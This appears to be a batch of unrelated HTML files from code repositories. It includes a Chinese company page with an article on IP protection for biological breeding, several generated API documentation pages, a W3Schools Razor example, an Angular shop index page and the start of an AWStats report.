$(this).removeClass("sele");
if((_p.indexOf(_h)!=-1 && _h!="/") || _p==_h){$(this).addClass("sele");}
});
});
</SCRIPT>
</div>
<div id="focusBar"> <a href="javascript:void(0)" class="arrL" onClick="prePage()"></a> <a href="javascript:void(0)" class="arrR" onClick="nextPage()"></a>
<ul class="mypng">
<li id="f_slider1" style="background:url(/templets/default/images/gsmmadbg.jpg) no-repeat center center; display:block;">
<div class="focusL"></div>
<div class="focusR"><a href="/a/jt/gszx.html" target="_blank"><img src="/templets/default/images/gsmmad.png" width="1900" height="279" alt="公司注销-公司转让" /></a></div>
</li>
<li id="f_slider2" style="background:url(/templets/default/images/sbzcadbg.jpg) no-repeat center center; display:none;">
<div class="focusL"></div>
<div class="focusR"><a href="/a/jt/sbzc.html" target="_blank"><img src="/templets/default/images/sbzcad.png" width="1920" height="279" alt="广州商标注册代理"/></a></div>
</li>
<li id="f_slider3" style="background:url(/templets/default/images/zlbqadbg.jpg) no-repeat center center; display:none;">
<div class="focusL"></div>
<div class="focusR"><a href="/a/zscq/" target="_blank"><img src="/templets/default/images/zlbqad.png" width="1920" height="279" alt="广州知识产权代办"/></a></div>
</li>
</ul>
<div class="adnum"></div>
</div>
<script src="/templets/js/jquery.easing.1.3.js"></script>
<script src="/templets/js/hcad.js"></script>
<div class="wapper_02">
<div class="new_box">
<div class="news_main">
<div class="news_menu">
<h2>>信息中心</h2>
<div class="info_ul">
<ul>
<li><a href='/a/zhishiku/cjwt/'>常见问题</a></li>
<li><a href='/a/zhishiku/hyzx/' class='thisclass'>行业资讯</a></li>
<li><a href='/a/zhishiku/zzfg/'>政治法规</a></li>
<li><a href='/a/zhishiku/zlbg/'>资料表格</a></li>
</ul>
</div>
<div class="img_list">
<a href="/a/rcfw/rsdl"><img src="/templets/images/bui_img2.png" alt="办理户口" width="210" /></a>
</div>
<div class="n_list">
<div class="list_title">户口社保<span><a href="/a/rcfw/rsdl" title="更多...">更多>></a> </span></div>
<ul>
<li><a href="/a/rcfw/rsdl/2014/1117/699.html">广州市各区社保局地址</a></li>
<li><a href="/a/rcfw/rsdl/2014/1105/651.html">单位社保挂靠</a></li>
<li><a href="/a/rcfw/rsdl/2014/1105/650.html">单位社保注销</a></li>
<li><a href="/a/rcfw/rsdl/2014/1105/649.html">个人信息变更</a></li>
<li><a href="/a/rcfw/rsdl/2014/1105/648.html">个人社保挂靠</a></li>
<li><a href="/a/rcfw/rsdl/2014/1105/644.html">应届毕业生可办理暂缓就</a></li>
</ul>
</div>
<div class="n_list">
<div class="list_title">工商财税<span><a href="/a/qyfw" title="更多...">更多>></a> </span></div>
<ul>
<li><a href="/a/qyfw/nzzc/2014/1127/720.html">广州公司营业单位开业登</a></li>
<li><a href="/a/qyfw/nzzc/2014/1127/719.html">广州公司营业单位注销登</a></li>
<li><a href="/a/qyfw/gsfw/2014/1127/718.html">广州公司出资方式变更登</a></li>
<li><a href="/a/qyfw/nzzc/2014/1121/713.html">营业执照的补办程序</a></li>
<li><a href="/a/qyfw/nzzc/2014/1120/710.html">个人独资企业设立资料</a></li>
<li><a href="/a/qyfw/gsfw/2014/1120/709.html">进出口权申请</a></li>
</ul>
</div>
<div class="n_list">
<div class="list_title">知识库<span><a href="/a/zhishiku" title="更多...">更多>></a> </span></div>
<ul>
<li><a href="/a/zhishiku/cjwt/2014/1204/745.html">2014年广州积分入户入围</a></li>
<li><a href="/a/zhishiku/hyzx/2014/1204/744.html">2015年深圳积分入户政策变</a></li>
<li><a href="/a/zhishiku/hyzx/2014/1204/742.html">8、社会医疗保险缴费月数</a></li>
<li><a href="/a/zhishiku/hyzx/2014/1204/741.html">8、社会医疗保险缴费月数</a></li>
<li><a href="/a/zhishiku/hyzx/2014/1204/740.html">7、社会医疗保险缴费月数</a></li>
<li><a href="/a/zhishiku/hyzx/2014/1204/739.html">7、社会医疗保险缴费月数</a></li>
</ul>
</div>
<div class="n_list">
<div class="list_title">常见问题<span><a href="/a/zhishiku/cjwt" title="更多...">更多>></a> </span></div>
<ul>
</ul>
</div> </div>
<div class="news_list">
<div class="postion"><span>您当前的位置:</span> <a href='/'>广州谱式达</a> > <a href='/a/zhishiku/'>晓·资讯</a> > <a href='/a/zhishiku/hyzx/'>行业资讯</a> > </div>
<div class="article">
<h1>如何加强生物育种知识产权保护?</h1>
<div class="info"> 发布于:<span>2014-10-22 10:07:29</span> 点击:<span><script src="/plus/count.php?view=yes&aid=527&mid=1" type='text/javascript' language="javascript"></script>次</span> </div>
<div class="neirong"><div>
<span style="font-size:14px;">生物育种是利用现代生物技术进行动植物新品种繁育的技术创新活动,是现代生物技术催生的战略性新兴产业之一。生物育种不仅关系到生物产业和新能源产业的未来发展,还事关粮食安全和国家安全。我国于2011年至2013年连续3年出台3个文件关注种业安全,应对当前种业发展面临的危机,充分显示了国家对种业安全重要性的认识不断提升。当前,加快实施生物育种知识产权保护战略、推动种业技术创新、确保国家种业安全已刻不容缓。</span></div>
<div>
<span style="font-size:14px;">知识产权保护是发达国家维护种业安全的根本手段。知识产权作为国际贸易的基本规则,正日益成为国际贸易竞争的战略武器和一国国际核心竞争力的重要标志。近年来,围绕世界生物资源的争夺愈演愈烈,发达国家通过知识产权手段在全球实施对种业产业链和价值链的控制,加速对发展中国家种业市场的占有和利益掠夺,形成生物育种垄断格局,对包括中国在内的发展中国家的种业安全构成严重威胁。加大生物育种知识产权保护,构筑种业安全的防护网和屏障,是目前发达国家维护其种业安全的重要手段。例如,美国、德国、英国、荷兰等发达国家对生物新品种实行专门法与专利法的“双轨制”叠加保护;意大利、匈牙利、新西兰等对生物新品种实行专门的知识产权立法保护。发达国家凭借其生物技术优势,力图通过加强生物育种知识产权保护,圈占并垄断国际生物资源,从控制农业终端农产品向控制农业的源头种子转变,争相构建本国在国际生物技术竞争中的核心优势,为赢得国际竞争夯实基础。</span></div>
<div>
<span style="font-size:14px;">知识产权保护不力导致我国种业安全危机渐显。我国生物育种知识产权保护起步较晚,知识产权对种业自主创新的激励不足,现有的生物育种知识产权保护还处于对新品种的粗糙保护阶段,尚未建立从种质资源到新品种推广全方位的生物育种知识产权保护体系,现实中还存在诸多法律空白和制度缺陷。我国知识产权保护不力使知识产权的价值难以得到充分显现,导致企业参与种业科技创新的动力不足,产、学、研的严重脱节导致我国缺乏生物育种核心技术,自主知识产权积累较少,种业科技先发能力和国际竞争优势较弱。知识产权保护不力引致一些套牌、冒牌种子冲击种业市场,挫伤了种业自主创新的积极性,致使国内种业企业技术研发投入不足,育、繁、推一体化运作的龙头种业企业少,国家种业企业缺乏强大的科技支撑力和国际核心竞争力。知识产权保护不力还导致我国种质资源严重外流,国外大垄断企业凭借强大的知识产权保护纷纷进入我国并控制许多关键领域,种业危机日渐逼近,进而威胁到国家农业安全。例如,我国的野生大豆种质资源被国外机构窃取后,申请了黄豆新品种知识产权,造成了中国人种自己的种子必须先出钱购买知识产权的尴尬。当前,我国大豆种子、玉米种子、花卉、蔬菜等种子产业几乎都有国外大垄断种业集团的渗透,他们占据核心技术优势,吞噬我国大量种业利益。在此背景下,我国亟须加强生物育种知识产权保护。</span></div>
<div>
<span style="font-size:14px;">生物育种知识产权保护的重点是激励种业自主创新。我国生物育种知识产权保护的首要任务,就是构建生物育种科技创新体系,激励和保护生物育种技术创新,促进种业研发与生产一体化,培育种业自主知识产权和商业化潜力。当前,我国种业的弱势与危机即在于技术创新不足,自主知识产权少,缺乏种业国际竞争的核心竞争力。因而,运用知识产权激励种业自主创新成为当务之急。保护种业安全具有公共性,是国家安全战略的重要组成部分,需要政府着力;同时,生物育种知识产权是一种无形资产,必须遵循市场机制和规律。因此,加大生物育种知识产权保护、激励种业自主创新,要加速政府与市场的有机对接,形成生物育种知识产权保护的动力机制。要强化政府推动力,加大政府对生物育种知识产权保护与创新的政策支持和基础研发投入。要充分发挥市场的原动力,优化生物技术和资源的配置,激发企业内生活力。同时,要发挥农民的主体积极性,增强生物育种知识产权保护与创新的支撑力。</span></div>
<div>
<span style="font-size:14px;">强化生物育种知识产权保护需要政策、法律和管理“三管齐下”。生物育种知识产权保护是一项系统工程,牵涉政府、科研机构、企业、农户等多方利益。因此,强化生物育种知识产权保护确保国家种业安全,必须从单纯的种业安全保护向提升农业综合竞争力转变,从生物育种技术支撑向农业科技创新战略支撑转变。必须以市场为导向、以企业为主体,打破国际技术垄断,激发国内育种技术创新活力,从政策、法律和管理等方面“三管齐下”建立全方位的保障体系。为此,要建立全面的生物育种知识产权保护制度,特别是完善相关遗传资源保护和惠益分享的政策体系,强化行政支撑;要完善生物育种相关立法,强化知识产权法律的执行和司法保护;要加强生物育种创新管理,完善生物育种的国际合作与交流管理,严防种质资源的盗失,构建全方位的生物育种知识产权管理与监控体系。</span></div>
<div>
<span style="font-size:14px;">生物育种知识产权保护是一场国际利益与主权的战争,必须将其上升到国家安全战略的高度,切实把国内知识产权规则与国际贸易规则有机结合起来,加快转变农业发展方式,实行高端要素集成战略,不断提升种业自主知识产权水平,强化生物育种知识产权保护,确保国家种业安全。同时,也要防止生物育种知识产权过度保护产生的异化,切实保护农户权益。(本文系国家社科基金项目《国家种业安全视域下的生物育种知识产权保护研究》〔14BJY134〕的阶段性成果)</span></div>
</div>
<div class="tagrr">本文关键词: <a href='/tags.php?/%E5%95%86%E6%A0%87%E6%B3%A8%E5%86%8C/'>商标注册</a>|
<a href='/tags.php?/%E5%A4%96%E8%B5%84%E6%B3%A8%E5%86%8C/'>外资注册</a>|
<a href='/tags.php?/%E7%9F%A5%E8%AF%86%E4%BA%A7%E6%9D%83/'>知识产权</a>|
<a href='/tags.php?/ICP%E5%8A%9E%E7%90%86/'>ICP办理</a>|
<a href='/tags.php?/%E8%83%8C%E6%99%AF%E8%B0%83%E6%9F%A5/'>背景调查</a>|
</div>
</div>
<div class="xian03"></div>
<div class="page_list">
<div class="last"><span></span>上一篇:<a href='/a/zhishiku/hyzx/2014/1022/526.html'>王老吉再诉加多宝侵权</a> </div>
<div class="next"><span></span>下一篇:<a href='/a/zhishiku/hyzx/2014/1022/528.html'>《中国正在听》即将开播 版权高达8000万</a> </div>
</div>
<div class="xian03"></div>
<div class="xg_article">
<h2>[相关阅读]</h2>
<ul>
<table width='100%' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1201/736.html'>5、社会医疗保险缴费月数:100-</a> </li>
</td>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1128/727.html'>2、社会医疗保险缴费月数:130-</a> </li>
</td>
</tr>
<tr>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1128/726.html'>1、社会医疗保险缴费月数:140-</a> </li>
</td>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1127/724.html'>非广州户籍不可补缴社保购房</a> </li>
</td>
</tr>
<tr>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1127/723.html'>广州住房公积金贷款利率下调0.</a> </li>
</td>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1127/722.html'>住房公积金缴存大检查 有意漏缴</a> </li>
</td>
</tr>
<tr>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1127/721.html'>香港设计师在深圳前海可享15%所得</a> </li>
</td>
<td width='50%'>
<li> <a href='/a/zhishiku/hyzx/2014/1126/716.html'>“快舟”创造我国航天发射最快纪</a> </li>
</td>
</tr>
</table>
</ul>
</div>
<div class="return"><a href="#">返回顶部</a></div>
</div>
</div>
</div>
</div>
<div style="clear:both;"></div>
<!----尾部开始----->
<div class="footer">
<ul class="foot">
<li class="f_w1">
<h1>联系我们</h1>
<p>
广州谱式达人力资源服务有限公司<br>
地址: 广州市海珠区昌岗中路 166 号<br>
富盈国际大厦 807室<br>
热线 : 4006-020-308<br>
电话 : 020-34479170<br>
Email: <a href="mailto:36908589@qq.com">36908589@qq.com</a>
</p>
</li>
<li class="f_w2">
<h1> </h1>
<p>
“谱式达”EAP服务中心<br>
地址 : 广州海珠区珠江帝景克莱公寓A座2604室<br>
Email:908927417@qq.com
</p>
</li>
<li class="f_w3">
<h1> </h1>
<div class="share">
<!-- Baidu Button BEGIN -->
<div id="bdshare" class="bdshare_t bds_tools_32 get-codes-bdshare"><div class="bdsharebuttonbox"><a class="bds_more" href="#" data-cmd="more"></a><a class="bds_qzone" title="分享到QQ空间" href="#" data-cmd="qzone"></a><a class="bds_tsina" title="分享到新浪微博" href="#" data-cmd="tsina"></a><a class="bds_tqq" title="分享到腾讯微博" href="#" data-cmd="tqq"></a><a class="bds_renren" title="分享到人人网" href="#" data-cmd="renren"></a><a class="bds_weixin" title="分享到微信" href="#" data-cmd="weixin"></a><a class="bds_fx" title="分享到飞信" href="#" data-cmd="fx"></a><a class="bds_bdhome" title="分享到百度新首页" href="#" data-cmd="bdhome"></a></div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script></div>
<!-- Baidu Button END -->
</div>
<p>
Copyright © 2015 谱式达 all rights reserved. <br>
版权所有:广州谱式达人力资源服务有限公司<br>
粤ICP备1503025-1
</p>
</li>
</ul>
</div>
<!----尾部结束----->
<div class="psdkf">
<div class="psdl">
<a style="display: none" id="psdpanel_show" class="btnopen" title="查看在线客服" onclick="javascript:$('#psdpanel').animate({width: 'show', opacity: 'show'}, 'normal',function(){ $('#psdpanel').show();});$('#psdpanel_show').attr('style','display:none');$('#psdpanel_hide').attr('style','display:block');" href="javascript:void(0);">展开</a>
<a id="psdpanel_hide" class="btnctn" title="关闭在线客服" onclick="javascript:$('#psdpanel').animate({width: 'hide', opacity: 'hide'}, 'normal',function(){$('#psdpanel').hide();});$('#psdpanel_show').attr('style','display:block');$('#psdpanel_hide').attr('style','display:none');" href="javascript:void(0);">收缩</a>
</div>
<div id="psdpanel" class="psdtr">
<div class="p_top"></div>
<div class="p_main">
<ul>
<li class="kf_t">达·服务</li>
<li><a class="icobd webMsg" href="javascript:void(0);" title="在线咨询-广州谱式达">商桥咨询</a></li>
<li><a class="icoqq group1" target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=3160963951&site=qq&menu=yes" title="在线咨询-入户难,广州谱式达为你解决!">户口/社保</a></li>
<li><a class="icoqq group2" target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=3079510171&site=qq&menu=yes" title="在线咨询-广州户口社保问题为您解答!">户口/社保</a></li>
<li><a class="icoqq group3" href="http://wpa.qq.com/msgrd?v=3&uin=3160963951&site=qq&menu=yes" title="在线咨询-DM派单业务问题为您解答!">派单咨询</a></li>
<li class="bot"><a class="icoqq group4" target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=3079510171&site=qq&menu=yes" title="在线咨询-资深业务经理问题为您解答!">咨询经理</a></li>
</ul>
<ul class="push114">
<li class="push114_c"><a href="/" target="_blank">谱式达官网</a></li>
</ul>
<ul class="psdtel">
<li class="psdtel_c"><span class="icotel">4006-020-308</span></li>
</ul>
</div>
</div>
</div>
<script type="text/javascript" src="/js/webmsg.js"></script>
<span>
<script type="text/javascript">var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F9359da697d59255f1b44e8f39e24cb08' type='text/javascript'%3E%3C/script%3E")) </script>
</span>
</body>
</html>
|
docs/types/SquirrelStatueSouthAddon.html | alucardxlx/caoticamente-shards | <html>
<head>
<title>RunUO Documentation - Class Overview - SquirrelStatueSouthAddon</title>
</head>
<body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080">
<h4><a href="../namespaces/Server.Items.html">Back to Server.Items</a></h4>
<h2>SquirrelStatueSouthAddon : <!-- DBG-1 --><a href="BaseAddon.html">BaseAddon</a>, <!-- DBG-2.2 --><a href="IEntity.html">IEntity</a>, <!-- DBG-2.2 --><a href="IPoint3D.html">IPoint3D</a>, <!-- DBG-2.2 --><a href="IPoint2D.html">IPoint2D</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="IEntity.html">IEntity</a>>, <!-- DBG-2.2 --><a href="IHued.html">IHued</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="Item.html">Item</a>>, <!-- DBG-2.2 --><a href="ISerializable.html">ISerializable</a>, <!-- DBG-2.2 --><a href="IChopable.html">IChopable</a>, <!-- DBG-2.2 --><a href="IAddon.html">IAddon</a></h2>
(<font color="blue">ctor</font>) SquirrelStatueSouthAddon()<br>
(<font color="blue">ctor</font>) SquirrelStatueSouthAddon( <!-- DBG-0 --><a href="Serial.html">Serial</a> serial )<br>
<!-- DBG-0 --><a href="BaseAddonDeed.html">BaseAddonDeed</a> Deed( <font color="blue">get</font>; )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Deserialize( <!-- DBG-0 --><a href="GenericReader.html">GenericReader</a> reader )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Serialize( <!-- DBG-0 --><a href="GenericWriter.html">GenericWriter</a> writer )<br>
</body>
</html>
|
coflo-0.0.4/third_party/boost_1_48_0/doc/html/boost_asio/reference/serial_port_base__stop_bits/type.html | charlesDGY/coflo | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>serial_port_base::stop_bits::type</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../boost_asio.html" title="Boost.Asio">
<link rel="up" href="../serial_port_base__stop_bits.html" title="serial_port_base::stop_bits">
<link rel="prev" href="store.html" title="serial_port_base::stop_bits::store">
<link rel="next" href="value.html" title="serial_port_base::stop_bits::value">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td>
<td align="center"><a href="../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="store.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../serial_port_base__stop_bits.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="value.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_asio.reference.serial_port_base__stop_bits.type"></a><a class="link" href="type.html" title="serial_port_base::stop_bits::type">serial_port_base::stop_bits::type</a>
</h4></div></div></div>
<p>
<a class="indexterm" name="id1514202"></a>
</p>
<pre class="programlisting"><span class="keyword">enum</span> <span class="identifier">type</span>
</pre>
<p>
<a class="indexterm" name="id1514231"></a>
<a class="indexterm" name="id1514240"></a>
<a class="indexterm" name="id1514249"></a>
</p>
<h6>
<a name="boost_asio.reference.serial_port_base__stop_bits.type.h0"></a>
<span><a name="boost_asio.reference.serial_port_base__stop_bits.type.values"></a></span><a class="link" href="type.html#boost_asio.reference.serial_port_base__stop_bits.type.values">Values</a>
</h6>
<div class="variablelist">
<p class="title"><b></b></p>
<dl>
<dt><span class="term">one</span></dt>
<dd></dd>
<dt><span class="term">onepointfive</span></dt>
<dd></dd>
<dt><span class="term">two</span></dt>
<dd></dd>
</dl>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2011 Christopher
M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="store.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../serial_port_base__stop_bits.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="value.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
liblinphone-sdk/apple-darwin/share/doc/linphone-3.7.0/html/struct__LinphoneVideoPolicy.html | techstormteam/12-vision-connect-ios-linphone | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.7"/>
<title>liblinphone: _LinphoneVideoPolicy Struct Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">liblinphone
 <span id="projectnumber">3.7.0</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.7 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li class="current"><a href="annotated.html"><span>Data Structures</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="functions.html"><span>Data Fields</span></a></li>
</ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-attribs">Data Fields</a> </div>
<div class="headertitle">
<div class="title">_LinphoneVideoPolicy Struct Reference<div class="ingroups"><a class="el" href="group__media__parameters.html">Controlling media parameters</a></div></div> </div>
</div><!--header-->
<div class="contents">
<p><code>#include <linphonecore.h></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-attribs"></a>
Data Fields</h2></td></tr>
<tr class="memitem:af2844cb3185be244283d0dd310a0d7c9"><td class="memItemLeft" align="right" valign="top">bool_t </td><td class="memItemRight" valign="bottom"><a class="el" href="struct__LinphoneVideoPolicy.html#af2844cb3185be244283d0dd310a0d7c9">automatically_initiate</a></td></tr>
<tr class="separator:af2844cb3185be244283d0dd310a0d7c9"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ae94ea7330374ad7aebbddde76b13f0e4"><td class="memItemLeft" align="right" valign="top">bool_t </td><td class="memItemRight" valign="bottom"><a class="el" href="struct__LinphoneVideoPolicy.html#ae94ea7330374ad7aebbddde76b13f0e4">automatically_accept</a></td></tr>
<tr class="separator:ae94ea7330374ad7aebbddde76b13f0e4"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>Structure describing policy regarding video streams establishments. </p>
</div><h2 class="groupheader">Field Documentation</h2>
<a class="anchor" id="af2844cb3185be244283d0dd310a0d7c9"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">bool_t _LinphoneVideoPolicy::automatically_initiate</td>
</tr>
</table>
</div><div class="memdoc">
<p>Whether video shall be automatically proposed for outgoing calls. </p>
</div>
</div>
<a class="anchor" id="ae94ea7330374ad7aebbddde76b13f0e4"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">bool_t _LinphoneVideoPolicy::automatically_accept</td>
</tr>
</table>
</div><div class="memdoc">
<p>Whether video shall be automatically accepted for incoming calls </p>
</div>
</div>
<hr/>The documentation for this struct was generated from the following file:<ul>
<li>linphonecore.h</li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Tue Jan 20 2015 15:32:28 for liblinphone by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.7
</small></address>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/aspnet/try_razor_vb_008.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/aspnet/try_razor_vb_008.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:13:45 GMT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" href="../showrazor.css" />
</head>
<body>
<span class="marked">@Code<br>Dim members as String()={"Jani","Hege","Kai","Jim"}<br>
i=Array.IndexOf(members,"Kai")+1<br>len=members.Length<br>x=members(2-1)<br>End
Code<br></span><html><br><body><br><h3>Members</h3><br>
<span class="marked">@For Each person In members<br> @<p>@person</p><br>
Next person</span><br><p>The number of names in Members are <span class="marked">@len</span></p><br>
<p>The person at position 2 is <span class="marked">@x</span></p><br><p>Kai is
now in position <span class="marked">@i</span></p><br><br></body><br></html><br>
</body>
<!-- Mirrored from www.w3schools.com/aspnet/try_razor_vb_008.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:13:45 GMT -->
</html>
|
client/index.html | nplagman/meanshop | <!doctype html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<base href="/">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width">
<!-- Place favicon.ico and apple-touch-icon.png in the root directory -->
<!-- build:css(client) app/vendor.css -->
<!-- bower:css -->
<!-- endbower -->
<!-- endbuild -->
<!-- build:css({.tmp,client}) app/app.css -->
<link rel="stylesheet" href="app/app.css">
<!-- injector:css -->
<!-- endinjector -->
<!-- endbuild -->
</head>
<body ng-app="meanshopApp">
<!--[if lt IE 7]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<!-- Add your site or application content here -->
<div ui-view=""></div>
<!-- Google Analytics: change UA-XXXXX-X to be your site's ID -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-X');
ga('send', 'pageview');
</script>
<!--[if lt IE 9]>
<script src="bower_components/es5-shim/es5-shim.js"></script>
<script src="bower_components/json3/lib/json3.min.js"></script>
<![endif]-->
<!-- build:js({client,node_modules}) app/vendor.js -->
<!-- bower:js -->
<script src="bower_components/jquery/dist/jquery.js"></script>
<script src="bower_components/angular/angular.js"></script>
<script src="bower_components/angular-resource/angular-resource.js"></script>
<script src="bower_components/angular-cookies/angular-cookies.js"></script>
<script src="bower_components/angular-sanitize/angular-sanitize.js"></script>
<script src="bower_components/angular-bootstrap/ui-bootstrap-tpls.js"></script>
<script src="bower_components/lodash/dist/lodash.compat.js"></script>
<script src="bower_components/angular-socket-io/socket.js"></script>
<script src="bower_components/angular-ui-router/release/angular-ui-router.js"></script>
<script src="bower_components/ng-file-upload/ng-file-upload.js"></script>
<script src="bower_components/ng-file-upload-shim/ng-file-upload-shim.js"></script>
<script src="bower_components/ngCart/dist/ngCart.js"></script>
<script src="bower_components/braintree-angular/dist/braintree-angular.js"></script>
<!-- endbower -->
<script src="socket.io-client/socket.io.js"></script>
<!-- endbuild -->
<!-- build:js(.tmp) app/app.js -->
<script src="app/app.js"></script>
<!-- injector:js -->
<!-- endinjector -->
<!-- endbuild -->
</body>
</html>
|
old/webstat/awstats.ckbran.ru.unknownip.112013.html | AxelFG/ckbran-inf | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta name="generator" content="AWStats 6.95 (build 1.943) from config file awstats.ckbran.ru.conf (http://awstats.sourceforge.net)">
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="description" content="Awstats - Advanced Web Statistics for ckbran.ru (2013-11) - unknownip">
<title>Statistics for ckbran.ru (2013-11) - unknownip</title>
<style type="text/css">
<!--
body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; }
.aws_bodyl { }
